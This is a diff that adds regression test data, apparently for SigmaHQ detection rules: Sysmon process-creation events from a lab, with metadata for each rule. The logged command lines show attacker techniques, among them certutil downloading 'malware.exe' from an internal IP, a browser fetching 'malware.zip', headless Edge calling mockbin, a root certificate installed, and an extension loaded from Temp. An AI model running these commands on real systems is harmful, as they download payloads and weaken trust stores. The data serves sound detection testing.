a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json new file mode 100644 index 000000000..3713caf79 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:28:43.862519Z" + } + }, + "EventRecordID": 32995046, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:28:43.810", + "ProcessGuid": "5AA13A44-AEAB-68FE-435E-000000004002", + "ProcessId": 5784, + "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", + "FileVersion": "141.0.3537.99", + "Description": "Microsoft Edge", + "Product": "Microsoft Edge", + "Company": "Microsoft Corporation", + "OriginalFileName": "msedge.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml new file mode 100644 index 000000000..7ad3f91ab --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml @@ -0,0 +1,12 @@ +id: 686da1dd-caec-47d8-a254-07ab54f1f3c7 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 1c526788-0abe-4713-862f-b520da5e5316 + title: Chromium Browser Headless Execution To Mockbin Like Site +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx new file mode 100644 index 000000000..c40cb656d Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json new file mode 100644 index 000000000..2582912bf --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:30:09.492105Z" + } + }, + "EventRecordID": 33024467, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:30:09.480", + "ProcessGuid": "5AA13A44-AF01-68FE-535E-000000004002", + "ProcessId": 2536, + "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "FileVersion": "141.0.7390.123", + "Description": "Google Chrome", + "Product": "Google Chrome", + "Company": "Google LLC", + "OriginalFileName": "chrome.exe", + "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml new file mode 100644 index 000000000..7db676ffb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml @@ -0,0 +1,12 @@ +id: 78e88bc4-deea-488e-a27f-b4d9d07d3a72 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 27ba3207-dd30-4812-abbf-5d20c57d474e + title: Suspicious Chromium Browser Instance Executed With Custom Extension +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx new file mode 100644 index 000000000..a4c87ed0f Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json new file mode 100644 index 000000000..a55107e51 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:34:35.016637Z" + } + }, + "EventRecordID": 33119645, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:34:35.002", + "ProcessGuid": "5AA13A44-B00B-68FE-9F5E-000000004002", + "ProcessId": 4584, + "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", + "FileVersion": "141.0.3537.99", + "Description": "Microsoft Edge", + "Product": "Microsoft Edge", + "Company": "Microsoft Corporation", + "OriginalFileName": "msedge.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" \"http://10.0.1.14/malware.zip\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml new file mode 100644 index 000000000..216b271d5 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml @@ -0,0 +1,12 @@ +id: c7f0da2b-2eb9-46ee-abd0-d2f8e3c81975 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 94771a71-ba41-4b6e-a757-b531372eaab6 + title: File Download From Browser Process Via Inline URL +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx new file mode 100644 index 000000000..c82d3ad0f Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json new file mode 100644 index 000000000..c9efaed51 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:39:33.565515Z" + } + }, + "EventRecordID": 33232425, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:39:33.564", + "ProcessGuid": "5AA13A44-B135-68FE-035F-000000004002", + "ProcessId": 10712, + "Image": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", + "FileVersion": "128.14.0", + "Description": "Tor Browser", + "Product": "Tor Browser", + "Company": "Mozilla Corporation", + "OriginalFileName": "firefox.exe", + "CommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "SHA1=9D317F48BA264346D1BA2DA10B0893B156FA69BF,MD5=66D34277F992DB4CA8561FD1A5C483E4,SHA256=683574EBC203C630AF98256516D7CBC50E270E7C5A56E1D46CB9CA671B3D9F32,IMPHASH=EEC7642CF938691D739D1F9BED0DF74D", + "ParentProcessGuid": "5AA13A44-B135-68FE-025F-000000004002", + "ParentProcessId": 1292, + "ParentImage": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", + "ParentCommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml new file mode 100644 index 000000000..267915f73 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml @@ -0,0 +1,12 @@ +id: 8e750cec-bc57-4b20-bd0a-006733558c56 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c + title: Tor Client/Browser Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx new file mode 100644 index 000000000..4526bfaff Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json new file mode 100644 index 000000000..b55c1820b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T16:54:23.873276Z" + } + }, + "EventRecordID": 11383720, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 16:54:23.866", + "ProcessGuid": "5AA13A44-00BF-68FD-3F35-000000004002", + "ProcessId": 8592, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -addstore -f root C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\cert.cer", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml new file mode 100644 index 000000000..ed41b8f49 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml @@ -0,0 +1,13 @@ +id: 5969ddb0-b4ab-47c9-a12b-471d6c6551c8 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: d2125259-ddea-4c1c-9c22-977eb5b29cf0 + title: New Root Certificate Installed Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx new file mode 100644 index 000000000..5c755afbd Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json new file mode 100644 index 000000000..46c374057 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T16:56:16.019794Z" + } + }, + "EventRecordID": 11418519, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 16:56:16.013", + "ProcessGuid": "5AA13A44-0130-68FD-4E35-000000004002", + "ProcessId": 5112, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -decode file.base64 file-decoded.ext", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml new file mode 100644 index 000000000..c1ab6ac35 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml @@ -0,0 +1,13 @@ +id: e582dfce-5cb3-4991-9719-9a336eb90a6f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 + title: File Decoded From Base64/Hex Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx new file mode 100644 index 000000000..429f79e94 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json new file mode 100644 index 000000000..27dce7a6b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:02:36.900637Z" + } + }, + "EventRecordID": 11537869, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:02:36.894", + "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", + "ProcessId": 6484, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml new file mode 100644 index 000000000..c9bf97f46 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml @@ -0,0 +1,13 @@ +id: ee435dcb-08cb-4de1-bb70-bdd27cf0dae9 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b + title: Suspicious Download Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx new file mode 100644 index 000000000..73837d70c Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json new file mode 100644 index 000000000..5de823e73 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:01:06.116464Z" + } + }, + "EventRecordID": 11507958, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:01:06.109", + "ProcessGuid": "5AA13A44-0252-68FD-7235-000000004002", + "ProcessId": 6432, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f http://10.0.1.14/malware.exe malware-ctl.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": 